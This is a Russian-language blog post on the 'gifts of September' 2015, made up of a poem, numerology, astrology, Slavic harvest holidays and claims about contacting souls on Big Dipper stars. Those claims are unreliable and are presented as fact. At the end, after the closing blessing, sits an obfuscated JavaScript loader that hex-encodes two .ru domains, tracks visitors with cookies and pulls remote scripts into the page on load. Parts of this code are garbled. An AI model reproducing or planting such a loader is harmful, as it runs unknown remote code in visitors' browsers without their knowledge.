хочу сюда!
 

Светлана

44 года, козерог, познакомится с парнем в возрасте 38-55 лет

Дары Сентября...

Дары Сентября…

 

Сентябрь... Деревья волнует за окном...
Преображением Осенним... Цикла началОм!
Березку украшает звездочками - листиками золотыми...
Все вокруг наполняет - осенними ароматами Земными...
Школьники выстроились в ряд...
Готовы получить новых знаний заряд...
Природа собирает Урожаи Свои!
Ещё один цикл открывая Матушки Земли!
Всё в равновесии - стрелка Весов,
Солнце и Луна - ГлазОм!
Восходит Лучезарная Эос - Утренняя Заря!
Блага всему Живому и Сущему,
Любящему и Идущему,
Ищущему и Ждущему -
В Радости - Света Дня!

Сентябрь месяц – девятый в Колесе низшего Зодиака, несущий в себе всю наполненность Девятки — числа, имеющего много измерений. Волнующее, внутренне противоречивое, стремительное, многословное, харизматичное, импульсивное, беспокойное, щедрое, творческое... 9 чарует нас, хотя и раздражает. Каждый аспект, присущий числу 3, в 9 усилен. Положите 3 под увеличительное стекло, и получите 9. Это число означает конец старого цикла и начало нового. В некоторых традициях (например, в ацтекской, буддийской, моистской и даосской) число девять связано с представлением о небесах.  В Древней Греции было 9 муз: Каллиопа (эпическая поэзия), Клио (история), Мельпомена (трагедия), Евтерпа (лирическая поэзия), Эрато (любовная поэзия), Терпсихора (танец), Урания (астрономия), Талия (комедия) и Полигимния (гимны). Существует 9 ангельских чинов: Серафимы, Херувимы, Престолы, Господства, Силы, Власти, Начала, Архангелы и Ангелы. Квадрат Пифагора, Сатурна, Ло-Шу.

Главная задача первого осеннего месяца — это, конечно, продлить себе лето и хорошее настроение. Это прекрасный момент, чтобы вобрать в себя тепло, солнце и тогда, еще как минимум три месяца, мы будем ощущать на губах вкус лета. И зима не покажется такой уж беспросветной!

Сентябрь — время, когда наши пра-пра справляли праздники, тесно связанные с урожаем, духами-оберегами, предками и небесными покровителями. Заканчивается пора полевых работ, собран урожай, наступает время свадеб и осенних ярмарок.

Дни Большой Медведицы продолжаются в сентябре.  Энергии звезд Большого Ковша проявятся через ритмы Солнца, Луны, Венеры, Марса и Юпитера. Этот год удивительно богат на влияние легендарных семи звезд Северного неба. Звездные души из этого направления в течении целых двух месяцев (август и сентябрь) будут получать усиленную поддержку родных миров. Дни наибольшего влияния священных звезд Большой Медведицы. В целом месяц сентябрь несет смешанные энергии мужского и женского начал от созвездия Большой Медведицы. Это прекрасная возможность установить связь со своими родными душами, которые живут на звездах. Семь миров Большой Медведицы находятся в относительной близости от Земли, поэтому при должном устремлении сообщение с ними пройдет успешно. Поскольку созвездие Большой Медведицы является родиной Учителей человечества, в дни его влияния вы можете получить весть от вашего ведущего Иерарха. Он может открыть вам свой лик. Будьте очень внимательны к знакам пространства. Если вы еще не видите и не слышите Тонкий мир, Учитель посылает вам знаки в виде событий текущего дня. Для того чтобы распознать эти подсказки, нужно быть внимательным к деталям событий. Энергии Большой Медведицы активны в Северном полушарии Земли, в полярных широтах. Чем ближе к Северному полюсу вы будете находиться в сентябре, тем большее влияние этого созвездия вы испытаете. В этом плане жители северных городов России и Европы находятся в более удачном положении, чем южане. Суровый Север хранит плазму Космического Огня священных созвездий, храм Матери Мира находится на горе Меру в надземной Шамбале. Меру - это северный полюс мира, самое духовно чистое пространство на планете, которое озаряют семь звезд Большой Медведицы. (О значении Великой Медведицы в текущем моменте – читать здесь http://pozitive.ucoz.ua/news/o_dukhe_vremeni_goluboj_lune_o_vratakh_lva_o_velikoj_medvedice_i_ne_tolko/2015-07-31-43).

В этот период проходит Закрытие Сварги - Небесной Обители Богов. Светлые Боги и Богини покидают Землю, а люди провожая их благодарят за те дары, которые они принесли на Землю. Благодарят за светлые и теплые дни, за богатый урожай и устраивают в их честь празденства. Основный смысл праздников сентября - благодарение за урожай, за все хорошие события, что принесло нам время с весны по осень, за покровительство и помощь за весь этот период.

Основной точкой годичного круга конечно же является День Осеннего Равноденствия.

В сентябре нас ждет два затмения: 13 сентября -  солнечное и 28 сентября - лунное. Одним из крупных событий августа 2015 было перемещение Юпитера в экономный и трудолюбивый знак Девы, в котором он не был 11 лет с 2004 года. В этом знаке Юпитер не приветствует роскошь и богатство, но помогает простым трудовым профессиям, а также способствует интеллектуальной работе. Обратите внимание на то, что 5 лет назад в 2010 году Юпитер пребывал в противоположном знаке Рыб, а это значит, что сейчас с августа-сентября 2015 года и впоследствии в первой половине 2016 года мы можем с вами получить развитие тех процессов, которые были заложены в 2010 году - транзитный Юпитер будет располагаться сейчас на той же оси домов, что и в 2010 году. Продолжается движение Марса по знаку Льва с 9 августа по 24 сентября что может принести прилив сил для огненных знаков и период повышенной конкуренции для противоположного знака Водолея. В это время мужчины будут более страстными и азартными болельщиками, в работе будет важен элемент увлечения. В работе с техникой повышается опасность пожаров, в спорных ситуациях есть опасность применения силы.

1 СЕНТЯБРЯ – 7 СЕНТЯБРЯ.

Как и каждый первый день месяца 1 сентября задает ритм всему месяцу. Начало осени, еще стоят погожие дни, но мы чувствуем приближение холодов. Наши предки посвящали эти дни Богини Макоши - Макошино Полетье. Макош - Великая Мать, Богиня всей Судьбы, Богиня плодородия. Имеет 12-13 годовых праздников и может чествоваться каждое полнолуние. Ее благодарят за богатый урожай, приносит дары и просят о счастливой судьбе.

ЗВЕЗДА АЛИОТ Великой Медведицы - расположена в ручке Ковша. Духовный импульс от нее пройдет к Земле в ночь с 1 на 2 сентября. В эти два дня хорошо медитировать на воссоединение с этой звездой, если это ваша звездная родина. Посвятите эти дни духовным практикам на природе, паломничеству по местам силы, решению вопросов, связанных с распространением духовных знаний. Начало новых дел, связанных с информацией, пройдет удачно. 12 сентября Алиот откроется энергиями Луны, в это время хорошо учиться, посещать тренинги, семинары, осваивать обучающие программы, заниматься творчеством. В этот день вам будут приходить космические идеи и звездные образы.

Читать далее Здесь ... - http://pozitive.ucoz.ua/news/dary_sentjabrja/2015-09-01-49




Святые Вера, Надежда, Любовь и мать их София - Мудрость ждут своего часа. Часа своей востребованности...Привыкли ждать. Им торопиться некуда, у них в запасе вечность....Три сестры готовы дать нам то, что мы утратили! София - она не случайно стоит за спинами дочерей. Через мудрость мы обретаем веру. Через мудрость мы не утратили надежду. Через мудрость мы храним любовь. Вера успокоит сердце, Надежда подаст руку, Любовь согреет и Мудрость подскажет как жить дальше.

 

Вот такие Чудесные для осознания Сентября Дары – Иди и Смотри!!!

 

Блага Всем! Мир Духа!

В Мире Света Единаго!

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20864",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("blog.i.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&d()}();
0

Комментарии